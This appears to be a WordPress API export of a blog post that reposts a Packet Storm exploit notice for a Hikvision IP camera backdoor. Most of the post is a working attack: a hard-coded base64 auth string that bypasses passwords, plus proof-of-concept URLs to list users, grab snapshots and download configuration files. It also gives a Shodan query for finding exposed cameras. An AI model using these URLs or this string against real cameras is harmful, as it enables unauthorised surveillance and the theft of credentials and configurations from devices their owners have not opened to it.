{"id":21856,"date":"2022-03-16T20:58:31","date_gmt":"2022-03-16T17:58:31","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166334\/hikvision-backdoor.txt"},"modified":"2022-03-19T09:41:03","modified_gmt":"2022-03-19T06:11:03","slug":"hikvision-ip-camera-backdoor","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/hikvision-ip-camera-backdoor\/","title":{"rendered":"Hikvision IP Camera Backdoor"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: Hikvision IP Camera &#8211; Backdoor<br \/>\n# Date: 14\/03\/2022<br \/>\n# Exploit Author: Sobhan Mahmoodi<br \/>\n# Reference: https:\/\/ipvm.com\/reports\/hik-exploit<br \/>\n# GitHub: https:\/\/github.com\/bp2008\/HikPasswordHelper\/<\/p>\n<p dir=\"ltr\">Hikvision included a magic string that allowed instant access to any camera, regardless of what the admin password was. All that was needed was appending this string to Hikvision camera commands: (?auth=YWRtaW46MTEK)<\/p>\n<p dir=\"ltr\"># Proof of Concept:<\/p>\n<p dir=\"ltr\">Retrieve a list of all users and their roles:<br \/>\n&#8211; http:\/\/camera.ip\/Security\/users?auth=YWRtaW46MTEK<\/p>\n<p dir=\"ltr\">Obtain a camera snapshot without authentication:<br \/>\n&#8211; http:\/\/camera.ip\/onvif-http\/snapshot?auth=YWRtaW46MTEK<\/p>\n<p dir=\"ltr\">Download camera configuration:<br \/>\n&#8211; http:\/\/camera.ip\/System\/configurationFile?auth=YWRtaW46MTEK<\/p>\n<p dir=\"ltr\">Shodan link to monitor:<br \/>\nhttps:\/\/www.shodan.io\/search?query=%22App-webs%22+%22200+OK%22<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Hikvision IP Camera &#8211; Backdoor # Date: 14\/03\/2022 # Exploit Author: Sobhan Mahmoodi # Reference: https:\/\/ipvm.com\/reports\/hik-exploit # GitHub: https:\/\/github.com\/bp2008\/HikPasswordHelper\/ Hikvision included a magic string that allowed instant access to any camera, regardless of what the admin password was. All that was needed was appending this string to Hikvision camera commands: (?auth=YWRtaW46MTEK) # Proof &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21856","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21856","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21856"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21856\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21856"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21856"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21856"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}